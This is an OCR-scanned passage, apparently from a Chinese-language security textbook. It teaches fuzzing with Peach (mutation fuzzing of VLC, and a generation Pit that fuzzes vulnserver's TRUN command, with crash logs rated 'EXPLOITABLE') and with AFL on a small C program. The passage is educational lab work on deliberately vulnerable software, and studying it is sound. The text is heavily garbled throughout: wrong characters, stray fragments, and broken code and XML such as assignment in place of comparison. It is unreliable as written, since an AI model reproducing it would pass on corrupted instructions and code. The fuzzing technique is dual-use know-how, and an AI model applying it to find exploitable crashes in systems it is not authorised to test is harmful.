e Agent(@ 和 @) 定 义 了 用 于 检测 目标 程序 运行 和 收集 相关 骨 尝 信息 的 调试 右 。 
收集 到 的 朋 温 信息 通过 人 工 审查 的 方式 被 分 类 为 “相关 ”的 和 “不 相关 ”的 。 

“相关 ”的 朋 演 信息 将 被 男 行 审 伍 ， 以 检查 漏洞 攻击 条 件 ， 并 确定 漏洞 攻击 

价值 。 

e Test(@ 和 @) 定 义 了 与 模糊 测试 过 程 相 关 的 配置 选项 。 在 本 例 中 ， 规 定 了 
fuzzed.rm 是 所 生成 的 测试 用 例 的 文件 名 ， 而 logs 则 为 包含 程序 朋 演 数据 日 忘 
的 目录 名 。 

Peach 提 供 了 多 种 方法 , 用 于 测试 所 编写 的 Pit 义 件 的 文档 结构 是 人 否 有 效 。 前 先 使 


用 --test 命 令 来 测试 和 验证 Pit 文 件 , 该 命令 将 解析 指定 的 Pit 文 件 并 报告 友 现 的 任何 问 


以 下 是 如 何 测试 Pit XML 文 件 的 示例 : 
C:\peach3>Peach.exe -t rm fuzz.xml 


[| Peach v3.1.124.0 
[[ Copyright (c) Michael Eddington 


[*] Validating file [rm fuzz.xml]... No Errors Found. 
下 面 显 示 如 何 使 用 前 面 创建 的 Pit 文 件 来 启动 一 个 新 的 Peach 会 话 : 
C:\peach3>Peach.exe rm fuzz.xml Default 


[| Peach v3.1.124.0 
[[ Copyright (c) Michael Eddington 


[*] Test 'Default' starting with random seed 41362. 
[R1,-,-] Performing iteration 
[1,-,-] Performing iteration 


[*] Fuzzing: TheDataModel.DataElement 0 
[*] Mutator: DataklementSwapNearNodesMutator 
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[2,-,-] Performing iteration 
[*] Fuzzing: TheDataModel.DataElement 0 
[*] Mutator: BlobDWORDSliderMutator 


[3,-,-] Performing iteration 
[*] Fuzzing: TheDataModel.DataElement 0 
[*] Mutator: BlobMutator 


有 时 需要 终止 模糊 测试 器 的 运行 ， 以 便 对 其 所 依赖 的 机 器 进行 维护 。 对 于 此 类 
情况 ，Peach 人 允许 随时 终止 或 恢复 会 话 。 RH 中 按 下 CtrlHC 组 合 键 即 可 
停止 当前 Peach 会 话 。 挂 起 会 话 时 会 有 如 下 输出 


[11,-,-] Performing iteration 
[*] Fuzzing: TheDataModel.DataElement 0 
[*] Mutator: BlobBitFlipperMutator 


——— Ctrl+C Detected 一 一 一 


C: Npeach3» 


终止 会 话 的 结果 可 在 Peach 日 志和 目录 (logs) 下 的 会 话 文 件 夹 中 查看 。 日 志 目 录 中 
的 文件 夹 使 用 以 下 命名 方案 : 在 模糊 测试 的 Pit XML 配置 文件 名 后 并 加 当前 目录 创 
建 时 刻 的 时 间 惟 (如 “rm fuzzxml .xml 2017051623016”)。 会 话 目录 中 有 一 个 
status.txt 文 件 ， 它 包含 相关 会 话 信息 ， 如 测试 用 例 的 数量 和 骨 尝 发生 的 次 数 及 相关 
文件 名 。 即 便 会 话 顺利 完成 ， 会 话 文件 夹 中 也 会 目 动 生成 一 个 名 为 Faults 的 文件 夹 ， 
检测 到 的 每 一 类 骨 演 在 该 目录 下 都 有 一 个 单独 的 文件 来 ， 而 每 一 类 有 骨 演 中 至 少 有 一 
个 测试 用 例 对 应 以 下 信息 : 
e 引发 朋 演 的 变异 测试 用 例 。 
e 在 骨 尝 时 收集 了 相关 程序 状态 的 调试 报告 , 包括 寄存 右 的 状态 和 值 、 部 分 栈 
内 容 以 及 从 WinDbg 插 件 !exploitable 获 取 的 自动 崩溃 分 析 和 安全 风险 评估 方 
面 的 信息 。 
e 被 变异 的 测试 用 例 对 应 的 最 初 测试 用 例 名 。 
会 话 可 直接 跳 过 已 执行 的 测试 继续 进行 , 可 通过 日 志 目 录 (logs) 中 相应 会 话 名 下 
的 status.txt 文 件 ， 查 看 模糊 测试 器 最 近 执 行 的 测试 用 例 的 相关 信息 。 


Peach Fuzzing Run 


Date of run: 5/29/2017 2:19:30 PM 
Peach Version: 3.1.124.0 

Seed: 31337 

Command line: rm fuzz.xml 
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Pit File: rm fuzz.xml 
. Test starting: Default 


. Iteration 1 : 5/29/2017 2:19:32 PM 

. Iteration 1 of 131795 : 5/29/2017 2:19:33 PM 

. Iteration 200 of 131795 : 5/29/2017 2:39:57 BM 
- Iteration 300 of 131795 : 5/29/2017 3:14:24 PM 


另 一 种 查看 由 Peach 执行 的 模糊 测试 的 进度 和 迭代 次 数 等 信息 的 方法 是 观察 其 
命令 行 输出 (迭代 次 数位 于 迭代 列表 中 的 第 一 项 )。 下 例 显 示 当 前 测试 对 应 的 迭代 次 
数 为 13: 


[13,131795,1515:0:24:09.925] Performing iteration 
[*] Fuzzing: TheDataModel.DataElement 0 
[*] Mutator: BlobBitFlipperMutator 


测试 会 话 才 真 正 有 意义 。 若 


注音 ， 只 有 选择 确定 性 模糊 测试 集 略 时 ， 恢 复 模 ; 
使 用 随机 稼 略 ， 则 饮 复 之 前 的 会 话 不 会 导致 太 大 差别 。 

要 恢复 会 话 ， 仅 需要 像 前 面 那样 运行 Pit 文 件 ， 并 使 用 --skipto 选 项 跳 转 人 至 指定 的 
测试 用 例 编号 。 下 例 演示 如 何 跳 过 100 个 测试 用 例 : 


C:\peach3>Peach.exe --skipto 100 rm fuzz.xml 


[| Peach v3.1.124.0 
[ Copyright (c) Michael Eddington 


*] Test 'Default' starting with random seed 31337. 
R100,-,-] Performing iteration 
100,9525022,1660:5:55:40.38] Performing iteration 
*] Fuzzing: IheDataModel.DataElement 0 

*] Mutator: BlobBitFlipperMutator 
101,9525022,2950:17:47:42.252] Performing iteration 


*] Fuzzing: TheDataModel.DataElement 0 
*] Mutator: BlobBitFlipperMutator 


实验 3-1: Peach 数据 变异 模糊 测试 


本 实验 使 用 Pit 文件 进行 Peach 数据 变异 模糊 测试 。 为 成 功 完 成 实验 , 请 按照 下 
列 步骤 操作 (假设 使 用 的 平台 是 Windows 1016447 RAS) « 
(1) 从 https:Wwww.videolan.org/vlc 下 载 和 安装 VLC 应 用 程序 。 
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(2) 为 你 的 Windows 版 本 (这 里 为 Windows 10) 安 装 Windows Debugger Tools: 
https://developer.microsoft.com/en-us/windows/downloads/windows-10-sdk 。 在 安装 期 
la), i2¢4*Debugeging Tools for Windows 选 项 ， 不 要 选中 其 他 选项 。 

(3) 按 照 http://community.peachfuzzer.com/v3/installation.html 上 提供 的 指令 ， 从 
www.peachfuzzer.com/resources/peachcommunity 下 载 Peach 3 并 安装 。 右 击 文 件 
peach-3.1.124-win-x64-release.zip， 将 Peach 3 安装 到 C:\peach3\ 目 录 中 。 


d 


注意 : 在 Windows 10 中 ， 默认 情况 下 ， 必 须 对 已 下 载 的 .zip 文 件 进 行 解除 锁 
定 ( 右 击 ， 然 后 选择 Unblock 选 项 )， 此 后 才能 解压 缩 。 否 则 ， 将 看 到 以 下 错 
误 消 息 : “错误 ,无 法 加 载 平台 汇编 程序 'Peach.Core.OS.Windows.dll' 。 汇 
编程 厅 [sic| 是 Internet 安 全 区 域 的 一 部 分 ， 加 载 被 阻止 .” 


(4) 使 用 以 下 Google 搜 索 查 询 ， 查找 6 个 .rm(RealMedia) 测 试 文件 , 将 它们 下 载 到 
新 目录 C:\peach3\rm samples 中 : 

intitle:"index of /" .rm 
警告 : 要 谨慎 处 理 从 Internet 下 载 的 .rm 文件 . 最 好 在 一 次 性 虚拟 机 上 完成 本 


练习 , 或 至 少 在 完成 后 进行 系统 还 原 , 或 先 到 virustotals.com 对 .rm 文件 进行 
验证 后 册 使 用 。 


(5) 将 本 书 在 线 提供 的 rm fuzz.xml 文 件 复制 到 Ci\peach3\ 文 件 来, 然后 测试 Peach 
Pit: 


C:\peach3\peach -t rm fuzz.xml 

(6) 确认 VLC 应 用 程序 的 位 置 以 及 其 他 路 径 ， 酌 情 进 行 修改 。 

(7) 从 管理 员 的 命令 提示 窗口 运行 Peach Pit( 为 了 在 Windows 10 上 执行 堆 监测 ， 
需要 这 么 做 ): 


C:\peach3\peach rm fuzz.xml Default 


(8) 让 这 个 Peach Pit 文 件 运 行 一 段 时 间 ( 可 考虑 在 夜间 运行 )， 看 一 下 日 志 中 是 个 
列 出 了 任何 Bug( 和 后 将 介绍 骨 尝 分 析 )。 


3.4 ” Peach 数据 生成 模糊 测试 \ 


由 前 面 可 知 ，Peach 是 一 个 有 效 的 变异 测试 絮 ; 但 实际 上 ， 它 是 一 个 更 好 的 数据 
生成 模糊 测试 器 。 本 节 将 尝试 找到 Stephen Bradshaw 的 vulnserver 中 的 漏洞 ， 这 是 一 
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个 存在 漏洞 的 服务 器 ， 专 供 学 习 模 糊 测试 和 漏洞 攻击 。 
vulnserver 凡 用 程序 带 有 预 编译 的 二 进 制 代 人 码 。 男 外 ， 你 可 按 提 供 的 指令 从 源 代 
人 码 进行 编译 。 在 Windows 计 算 机 上 局 动 vulnserver 后 ， 将 看 到 如 下 问候 : 


C:\Users\test\Downloads>vulnserver.exe 
Starting vulnserver version 1.00 
Called essential function dll version 1.00 


This is vulnerable software! 
Do not allow access from untrusted systems or networks! 


ao 仅 在 隔离 的 测试 系统 或 以 host-only 模 式 运 行 的 虚拟 机 上 
运行 该 软件 。 这 是 一 个 警示 ! 

rdi ELE 过 netcatj 进 行 连接 ， 从 而 测试 这 个 存在 漏洞 的 服务 器 ， 如 下 
所 示 : 


C:\Users\test\downloads\ncllint safe»nc localhost 9999 
Welcome to Vulnerable Server! Enter HELP for help. 
HELP 

Valid Commands: 

HELP 

STATS [stat value] 

RTIME [rtime value] 

LTIME [ltime value] 

SRUN [srun value| 

IRUN [trun value] 

GMON [gmon value] 

GDOG [gdog value] 

KSTET [kstet value] 

GTER [gter value] 

HTER [hter value] 

LTER [lter value] 

KSTAN [lstan value] 

EXIT 


前 面 已 对 vulnserver 应 用 程序 以 及 执行 的 命令 做 了 简略 介绍 ， 下 面 创建 一 个 针对 
此 应 用 程序 的 Peach Pit。 由 于 已 经 熟悉 了 Peach， 我 们 将 直接 进入 Peach Pit。 但 这 次 
将 更 改 DataModel( 数 据 模 型 )， 以 显示 有 效应 用 程序 命令 的 结构 。 为 简单 起 见 ， 将 模 
糊 测 试 TRUN 命 令 ( 这 是 随机 选择 的 ), 在 本 市 的 练习 中 , 可 对 其 他 命令 进行 模糊 测试 。 
注意 ， 这 个 Peach Pit 基 于 David Um 所 做 的 出 色 工 作 ， 而 David Um 上 所 做 的 工作 又 建立 
在 Dejan Lukan 所 做 工作 的 基础 之 上 。 

<?xml version="1.0" encoding="utf-8"?> 


<Peach xmlns="http://peachfuzzer.com/2012/Peach" 
xmlns:xsi-http://www.w3.org/2001/XMLSchema-instance 


of 


"Bn fox 
xsi:schemaLocation-"http://peachfuzzer.com/2012/Peach ../peach.xsd"» 


@ <DataModel name="DataTRUN"> 
«String value="TRUN " mutable-"false" token="true"/> 


«String value-""/» 
«String value="\r\n" mutable-"false" token-"true"/» 


« / DataModel» 


«StateModel name="StateTRUN" initialState="Initial"> 


«State name="Initial"> 
«Action type-"input" ><DataModel ref="DataResponse"/></Action> 


«Action type-"output"»«DataModel ref="DataTRUN"/></Action> 
«Action type-"input" ><DataModel ref="DataResponse"/></Action> 


</State> 
</StateModel> 


<DataModel name-"DataResponse"» 
<String value=""/> 
</DataModel> 


© «Agent name-"RemoteAgent" location="tcp://127.0.0.1:9001" 
<!-- Run and attach windbg to a vulnerable server. 一 一 > 
«Monitor class="WindowsDebugger"> 


<Param name="CommandLine 
value="C:\users\test\downLloads\vulnserver.exe"/> 


<Param name="WinDbgPath" value=" C:\Program Files 
(x86) \Windows Kits\10\Debuggers\x64" /> 
</Monitor> 
</Agent> 


«Test name="TestTRUN"> 
<Agent ref="RemoteAgent"/> 
<StateModel ref="StateTRUN"/> 


© <Publisher class="TcpClient"> 
«Param name-"Host" value="127.0.0.1"/> 


«Param name-"Port" value="9999"/> 


«/Publisher» 


«Logger class-"File 
<Param name-"Path" value="Logs"/> 


</Logger> 
</Test> 
</Peach> 
下 面 列 出 基于 数据 生成 方式 的 Peach Pit 与 前 面 基于 数据 变异 方式 的 Peach Pit 之 
则 的 主要 区 别 。 


° a : 已 经 修改 了 数据 模型 来 摘 述 TRUN 命 令 语法 ， 即 TRUN 后 跟 


空格 (可 变异 且 可 模糊 测试 )， 再 跟 一 个 回 车 (rn)。 
Agent(@): 已 经 修改 了 代理 ， 以 表明 将 局 动 远程 Peach 代理 ， 从 而 开始 监测 
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应 用 程序 的 进度 ， 并 在 必要 时 重 局 。 
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e Publisher) 已 对 其 进行 修改 ， 以 演示 Peach 的 TCP 连 接 能 力 (在 给 出 存在 漏 


洞 的 应 用 程序 的 地 址 和 疾 口 的 前 提 下 )。 
要 运行 Peach Pit， 首 先 需 要 局 动 Peach 人 代理， 如 下 所 示 : 


C:\peach3>peach -a tcp 
ME, TESTE dA An then Bd L1] JH JJF aaa: 
C:\peach3>peach fuzz TRUN.xml TestTRUN 


[[ Peach v3.1.124.0 
[[ Copyright (c) Michael Eddington 


[*] Test 'TestTRUN' starting with random seed 59386. 


[R1,-,-] Performing iteration 


11,-.-] Performing iteration 
[*] Fuzzing: DataTRUN.DataElement 1 
[*] Mutator: UnicodeBomMutator 


[2,-,-] Performing iteration 
[*] Fuzzing: DataTRUN.DataElement 1 
[*] Mutator: DatabklementRemoveMutator 


[3,-,-] Performing iteration 
[*] Fuzzing: DataTRUN.DataElement 1 
[*] Mutator: DatabklementRemoveMutator 


[4,-,-] Performing iteration 
[*] Fuzzing: DataTRUN.DataElement 1 
[*] Mutator: UnicodeBomMutator 


[5,-,-] Performing iteration 
[*] Fuzzing: DataTRUN.DataElement 1 
[*] Mutator: UnicodeBadUtf8Mutator 


[6,-,-] Performing iteration 
[*] Fuzzing: DataTRUN.DataElement 1 
[*] Mutator: DataElementDuplicateMutator 


[7,-,-] Performing iteration 
[*] Fuzzing: DataTRUN.DataElement 1 
[*] Mutator: UnicodeBomMutator 


Mondo sRIETEXS TT, TEXUSS— Bx IRE, KESA PIRA: 
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[185,-,-] Performing iteration 
[*] Fuzzing: DataTRUN.DataElement 1 
[*] Mutator: UnicodeBadUtf8Mutator 


-- Caught fault at iteration 185, trying to reproduce -- 


[185,-,-] Performing iteration 
[*] Fuzzing: DataTRUN.DataElement 1 
[*] Mutator: UnicodeBadUtf8Mutator 


-- Reproduced fault at iteration 185 一 一 


[186,-,-] Performing iteration 
[*] Fuzzing: DataTRUN.DataElement 1 
[*] Mutator: UnicodeBadUtf8Mutator 


E- ex 
AN 


Bu 计数 有 可 能 是 不 同 的 ， 具 体 取决 于 所 使 用 的 种 子 值 . 


rn PMD aede SR, IFAT DDE. 
BAIR 23 AT 


在 模糊 测试 会 话 期 间 ， 若 一 切 都 按 计 划 顺 利 进行 ， 则 会 生成 一 些 目标 程序 的 崩 
省 日 志 。 而 根据 所 使 用 的 模糊 测试 器 的 不 同 ， 将 产生 不 同 的 崩溃 追踪 。 下 面 是 一 些 


h LAY BH vB: 
。 可 用 来 重 现 朋 省 的 样本 文件 或 数据 记录 。 对 于 文件 模糊 测试 器 , 用 于 测试 的 


样本 文件 将 被 保存 并 做 好 标记 以 供 审查 。 而 对 于 网 络 应 用 模糊 测试 器 ， 当 检 
测 到 程序 崩 演 时 可 能 会 记录 并 保存 PCAP 文 件 。 示 例文 件 和 数据 记录 是 追踪 
应 用 程序 骨 尝 的 最 基本 方法 ， 但 没有 提供 月 尝 发 生 时 的 上 下 文 信息 。 

应 用 程序 的 骨 尝 日 志文 件 可 通过 多 种 方式 收集 。 通 第 调试 器 可 用 于 监测 目标 
程序 状态 并 检测 任何 朋 汉 迹象 。 当 发 现 骨 沉 时 ,调试 器 会 收集 CPU 的 上 下 文 
言 已 (例如 ， 奇 存 器 的 状态 和 栈 斥 丰 )， 并 将 其 与 朋 误 样本 文件 一 起 存储 。 骨 
imn A TTS ARR ARRAY CL AA IR] ZR RA. AN, DFA RE Be 
因 同 样 的 Bug 而 朋 误 很 多 次 。 不 了 解 朋 溃 发 生 的 上 下 文 信息 ， 就 很 难 判 定 漏 
洞 所 在 。 崩 溃 日 志 提 供 了 将 裔 溃 过 滤 和 分 组 为 单 例 漏洞 的 第 一 手 重要 信息 。 
许多 目 定 义 脚本 可 在 程序 朋 泪 时 运行 ,从 而 收集 特定 类 型 的 信息 。 实 现 这 类 
脚本 最 简单 的 方法 是 扩展 调试 器 。!exploitable 就 属于 这 种 有 用 的 调试 右 扩 
展 ， 古 微软 为 WinDbg 开 友 的 ， 用 于 检查 骨 误 是 售 可 被 利用 。 必 须 指 出 ， 即 
便 ‘exploitable 非常 有 用 ， 并 且 可 提供 骨 尝 及 其 分 类 的 有 价值 信息 ， 也 不 应 
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LOC AE ince BAAD, DET UA WT. iA HTT A D 


在 处 理 衣 "m 使 用 Peach 框架 的 好 处 很 多 ,Peach 使 用 WinDbg 及 其 !exploitable 
扩展 收集 朋 尝 相关 的 上 下 文 信息 并 进行 衣 尝 归 类 。 

如 前 所 述 ，Peach 将 所 有 骨 尝 相关 的 数据 整理 归档 到 Faults 目 录 下 ， 其 目录 结构 
Qu Ata: 


C:\peach3>cd logs 
C:\peach3\Logs>dir 


Directory of C:\peach3\Logs 


05/29/2017 04:46 PM <DIR> 
05/29/2017 04:46 PM <DIR> 
05/29/2017 04:46 PM <DIR> fuzz TRUN.xml TestTRUN 20170529164646 
05/29/2017 04:47 PM <DIR> fuzz TRUN.xml TestTRUN 20170529164655 


分 析 第 二 次 运行 测试 ， 可 看 到 Faults 目 录 包 含 以 下 目录 : 


C:\peach3\Logs\fuzz TRUN.xml TestTRUN 20170529164655\Faults>dir 


05/29/2017 04:47 PM <DIR> 
05/29/2017 04:47 PM <DIR> 
05/29/2017 04:47 PM <DIR> 
EXPLOITABLE Oxlble681f 0x191a342e 


继续 癌 下 分 机， 可 找到 实际 测试 用 例 ID(185) 及 其 内 容 : 


C:\peach3\Logs\fuzz TRUN.xml TestTRUN 20170529164655\Faults\ 
EXPLOITABLE Oxlble681f 0x191a342e\185>dir 

Volume in drive C has no label 

Volume Serial Number is 8E73-2A28 


Directory of 
C:\peach3\Logs\fuzz TRUN.xml TestTRUN 20170529164655\Faults\ 
EXPLOITABLE 0xlble681f 0x191a342e\185 


05/29/2017 04:47 PM <DIR> 

05/29/2017 04:47 PM <DIR> - 

05/29/2017 04:47 PM 51 1l.Initial.Action.bin 
05/29/2017 04:47 PM 3,270 2.Initial.Action 1.bin 
05/29/2017 04:47 PM 0 3.Initial.Action 2.bin 
05/29/2017 04:47 PM «DIR» Initial 

05/29/2017 04:47 PM 4,987 
RemoteAgent.Monitor.WindowsDebugEngine.description.txt 
05/29/2017 04:47 PM 4,987 
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RemoteAgent.Monitor.WindowsDebugEngine.StackTrace.txt 
5 File(s) 13,295 bytes 
3 Dir(s) 401,242,869,760 bytes free 


测试 用 例 185 所 在 文件 夹 中 的 5 个 文件 之 一 RemoteAgent.Monitor.WindowsDebueg- 
Engine.description.txt 中 包含 与 朋 演 关系 最 密切 的 信息 。 朋 尝 日 志 的 一 个 示例 (为 简洁 
起 见 ， 己 删除 部 分 行 ) 如 下 : 


C:\peach3\Logs\fuzz TRUN.xml TestTRUN 20170529164655\Faults\ 
EXPLOITABLE Oxlble681f 0x191a342e\185>type 
RemoteAgent.Monitor.WindowsDebugEngine.description.txt 
doekxxexxxee*** Symbol Path validation summary ***** Joe 
Response Time (ms) Location 

Deferred SRV*http://msdl.microsoft.com/download/symbols 


@ Microsoft (R) Windows Debugger Version 10.0.15063.400 AMD64 
Copyright (c) Microsoft Corporation. All rights reserved. 


CommandLine: C:\users\test\downloads\vulnserver.exe 


kk KEKE Symbol Path validation summary 火炎 大火 火 火 火 火 火炎 火炎 火炎 
Response Time (ms) Location 

Deferred SRV*http: //msdl.microsoft.com/download/symbols 
Symbol search path is: 
SRV*http://msdl.microsoft.com/download/symbols 

Executable search path is: 

ModLoad: 00000000°00400000 00000000°00407000 | image00000000'00400000 
ModLoad: 00007ff8' ^ aefd0000 00007ff8'aflal1000  ntdll.dll 

ModLoad: 00000000°777c0000 00000000777943000 ) ntdll.dll 

ModLoad: 00000000°72100000 00000000°72152000 

C:\WINDOWS \System32\wow64.dl1l 

ModLoad: 00000000°72160000 00000000°721d7000 

C: \WINDOWS \System32\wow64win.dll 

ModLoad: 00000000°000c0000 00000000°0016c000  WOW64 IMAGE SECTION 
...truncated for brevity 

ModLoad: 00000000°74ba0000 00000000 74bfa000 
C:\WINDOWS\SysWOW64\bcryptPrimitives.dll 

ModLoad: 73200000 7324e000 C:\WINDOWS\Syswow6o4\mswsock.d11l 
(5970.5bd4): Access violation - code c0000005 (first chance)r 


eax-0108f1f8 ebx-00000104 ecx-00e8551c edx=00000000 esi=00401848 edi=00401848 
eip-80f88881 esp-0108f9d8 ebp-80808080 iopl-0 nv up ei pl zr na pe nc 
cs=0023 ss=002b ds=002b es-002b fs-0053 gs=002b ef1=00010246 
80f88881 ?? 22? 

rF 

„truncated for brevity 

xmm7=0 0 0 0 

80f88881 ?? 729 
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kb 
ChildEBP RetAddr Args to Child 
WARNING: Frame IP not in any known module. Following frames may be 
wrong. 
0108f9d4 c0b88080 80fe69bl 80808080 ac80e0ae 0x80f88881 
0108f9d8 80fe69b1 80808080 ac80e0ae e03cb3c0 0xc0b88080 
„truncated for brevity 
@ !exploitable -m 
IDENTITY:HostMachineMHostUser 
PROCESSOR: X86 
..truncated for brevity 
STACK FRAME :mswsock!D11MaintOx17£ 
STACK FRAME:msvcrt! initptd+0xbo 
STACK FRAME:essftunctOxlOed 
STACK FRAME:mswsock! DllMainCRTStartup-tOxlb 
INSTRUCTION ADDRESS:Oxffffffff80f88881 
INVOKING STACK FRAME:3 
DESCRIPTION:Data Execution Prevention Violation 
SHORT DESCRIPTION: DEPViolation 
© CLASSIFICATION: EXPLOITABLE 
BUG TITLE:Exploitable - Data Execution Prevention Violation starting 
at Unknown Symbol @ Oxffffffff80f88881 called 
from mswsock!DllMain-0x000000000000017f (Hash=0x1lble681f.0x191a342e) 
EXPLANATION:User mode DEP access violations are exploitable. 
C:\peach3\Logs\fuzz TRUN.xml TestTRUN 20170529164655\Faults\EXPLO 
ITABLE O0x1b1e681f 0x191a342e\185> 


该 文件 主要 由 两 部 分 组 成 : 
e Ui eer TT BR tfe h» 包括 加 载 模块 名 称 、CPU 寄 存 器 信息 和 内 存 片段 。 
这 些 信息 涵盖 上 述 日 志 中 从 @ 开 始 的 内 容 。 
e ”I!exploitable 报 告 包 含 朋 尝 及 其 分 类 信息 。 这 部 分 日 志 提 供 了 EE in EF 
文 的 信息 ， 如 异常 码 、 栈 帧 信息 、Bug 标 题 和 分 类 。 其 中 分 类 是 !exploitable 
对 朋 尝 的 可 利用 性 潜力 的 评估 结论 ， 包 括 四 种 可 能 的 等 级 : 可 利用 
(Exploitable)、 可 能 可 利用 @robably bc id 可 能 无 法 利用 (Probably Not 
Exploitable) 和 未 知 (Unknown)。 这 些 信息 涵盖 上 面 日 志 中 从 @ 开 始 到 @ 的 
^d. 
浏览 @ 处 的 分 类 信息 ， 可 确定 是 否 需要 花费 更 多 时 间 来 研究 这 个 潜在 漏洞 
这 里 可 以 看 到 ， 在 本 例 中 ， 存 在 可 利用 的 漏洞 ， 有 关 分 机 和 漏洞 利用 的 详情 ， 请 参 
阅 本 书 其 他 章节 。 


实验 3-2， Peach 数据 生成 模糊 测 斌 


可 参照 前 一 示例 ， 执 行 以 下 实验 步骤 : 
(1) 将 存在 漏洞 的 服务 器 应 用 程序 Cexe 和 .dlD 下 载 到 自己 的 测试 实验 环境 , 或 自行 
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构建 (https://github.com/stephenbradshaw/vulnserver)。 将 可 执行 文件 放 在 Ci\vulnserver 中 。 
(2) 局 动 存在 漏洞 的 服务 器 ， 如 下 所 示 ( 注 意 输 出 中 的 警告 信息 ): 


C: Nvulnserver»vulnserver.exe 


(3) 在 Windows 上 , 下 载 并 安装 netcat 的 AMV 安 全 版 本 (不 使 用 -e): https://joncraton.org/ 
blog/46/netcat-for-windows/ 。 
(4) 在 男 一 个 窗口 中 测试 存在 漏洞 的 服务 右 ， 如 下 所 示 : 


C:\Users\test\downloads\nclilnt safe»nc localhost 9999 


(5) 将 前 面 的 fzz _ TRUN.xml 文 件 ( 可 从 本 书 网 站 下 载 ) 复 制 到 C:\peach3\ 文 件 夹 。 
(6) 从 过 理 员 命令 提示 窗口 司 动 Peach 代理 : 

C:\peach3> peach -a tcp 

(7) 从 新 的 管理 员 命令 提示 窗口 局 动 Peach Pit: 

C:\peach3> peach fuzz TRUN.xml TestTRUN 


(8) 监测 和 得 看 logs 文 件 严 (C:peach3\logs)。 


CN 警告 : 根据 所 使 用 的 Windows 版 本 ， 有 可 能 看 到 的 是 警告 消息 ， 也 可 能 是 

WV 已 存在 漏洞 导致 服务 器 崩溃 ， 需 要 重新 启动 测试 。 测 试 过 程 可 能 需要 生成 
多 个 测试 用 例 ， 数 量 甚 至 可 能 达到 上 千 个 (具体 数量 完全 赁 运气 )， 之 后 ， 
程序 才能 找到 故障 断 点 。 


3.5 AFL 中 传 或 进化 模糊 测试 


对 于 遗传 或 进化 模糊 测试 而 言 ， 最 佳 选择 是 AFL(American Fuzzy Lop), X FH 
C 或 C++ 编 与 的 基于 文件 的 分 析 堪 而 言 尤其 如 此 。 在 有 源 代 码 的 情况 下 , 应 用 程序 可 
以 在 使 用 clang 或 g++ 进行 编译 时 ， 使 用 AFL 进 行 检测 。 本 节 将 查看 这 个 “文件 分 析 ” 
应 用 程序 ， 访 应 用 程序 会 对 数据 变异 模糊 测试 右 构 成 相当 大 的 挑战 。 访 应 用 程序 改 
编目 Gynvael Coldwind (Michael Skladnikiewicz) 给 出 的 示例 ，Gynvael Coldwind 的 示 
例 已 在 优秀 的 遗传 模糊 测试 视频 博客 中 播 出 。Gynvael 解 释 说 ， 如 果 应 用 程序 包含 很 
ZREWMifthenR, 那么 在 我 们 有 生 之 年 ， 数 据 变 异 模糊 测试 右 通 常 很 难 (甚至 无 法 ) 
达到 整个 代码 范围 。 分 析 以 下 简单 示例 。 
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root@kali:~/afl-2.41b# cat input/file.txt 

aaaaaaaa 

root@kali:~/afl-2.41b# cat asdf3.c 

#include <stdio.h> 

#include <stdlib.h> 

#code adapted with permission from Gynvael - 
fhttps://github.com/gynvael/stream-en/tree/master/019-genetic-fuzzing 


int main(int argc, char **argv) { 
FILE *f = fopen(argv[1], "rb"); 
if (!f) { 
return 1; 


} 


char buf[16] = {0}; 
fread(buf, 1, 16, f); 
fclose(f); 


if (buf[0] == 'a') { 
if (buf[1] = 'b') { 
if (buf[2] == 'c') { 
if (buf[3] == 'd') { 
if (buf[4] == 'e') { 
if (buf[5] = 'f') { 
if (buf[6] = 'qg') 1 
if (buf[7] == 'h') { 

(1) abort (); 
} 


return 0; 

} 

@ 处 的 abort0 函 数 调用 将 导致 程序 骨 溃 ， 问 题 在 于 模糊 测试 器 能 否 发 现 它 。 使 
用 数据 变 卉 模糊 测试 右 时 ， 如 采 一 座 提 区 一 个 输入 文件 ， 则 有 1/256 的 可 能 性 击 中 这 
个 最 里 面 的 代码 块 。 如 果 计算 机 不 能 每 秒 处 理 1000 个 文件 ， 而 且 运 气 不 佳 ， 使 用 数 
据 变 措 模糊 测试 磊 ， 则 可 能 需要 耗费 数 年 的 时 间 来 完成 这 个 模糊 测试 ， 计 算 方式 
如 下 : 

$ python 

Python 2.7.10 (default, Oct 23 2015, 18:05:06) 


[gcc 4.2.1 Compatible Apple LLVM 7.0.0 (clang-700.0.59.5)] on darwin 
Type "help", "copyright", "credits" or "license" for more information. 
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>>> 256**8/1000/86400/365 
284942417L 
>>> 


ERT, aot a EK SE APLOR AIX ER I. H HAFLI M] LEHT, Ul 


FB: 


root@kali:~/afl-2.41b# ./afl-clang ./asdf3.c -o asdf3 
afl-cc 2.41b by <lcamtuf@google.com> 
afl-as 2.41b by <lcamtuf@google.com> 


[+] Instrumented 13 locations (32-bit, non-hardened mode, ratio 


100%). 


下 面 使 用 AFL 局 动 模糊 测试 : 


root@kali:~/afl-2.41b# ./afl-fuzz -i input/ -o output -d ./asdf3 


IC 
afl-fuzz 2.41b by <lcamtuf@google.com> 
[+] You have 2 CPU cores and 1 runnable tasks (utilization: 
[+] Try parallel jobs - see 
/usr/local/share/doc/afl/parallel fuzzing.txt. 
[*] Checking CPU core loadout... 
[+] Found a free CPU core, binding to #0. 
[*] Checking core patters..: 
[*] Setting up output directories... 
[+] Output directory exists but deemed OK to reuse. 
[*] Deleting old session data... 
[+] Output dir cleanup successful. 
[*] Scanning 'input/'... 
[+] No auto-generated dictionary tokens to reuse. 
[*] Creating hard links for all input files... 
[*] Validating target binary... 
[*] Attempting dry run with '1d:000000,orig:file.txt'... 
[*] Spinning up the fork server... 
[+] All right - fork server is up. 
len = 9, map size = 5, exec speed = 360 us 
[+] All test cases processed. 


[+] Here are some useful stats: 
Test case count : 1 favored, 0 variable, 1 total 


Bitmap range : 5 to 5 bits (average: 5.00 bits) 
Exec timing : 360 to 360 us (average: 360 us) 


[*] No -t option specified, so I'll use exec timeout of 20 ms. 


[+] All set and ready to roll! 


如 图 3-1 所 示 ，AFL 包含 信息 丰富 的 接口 。 最 重要 的 信息 位 于 右上 角 ， 从 中 可 了 


解 到 完成 的 循环 、 找 到 的 路 径 总 数 以 及 朋 温 数量 。 
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american fuzzy lop 2.41b (asdf3) 


process timing overall results 
run time : @ days, @ hrs, 5 min, 42 sec Cycles done : 441 
last new path : @ days, @ hrs, 2 min, 6 sec total paths : B 
last uniq crash : @ days, @ hrs, 8 min, 34 sec uniq crashes : 1 
last uniq hang : none seen yet uniq hangs : 8 
cycle progress map coverage 
now processing : 5 (62.50%) map density : 0.01* / 0.03* 
paths timed out : @ (0.009) count coverage : 1.80 bits/tuple 
stage progress findings in depth 
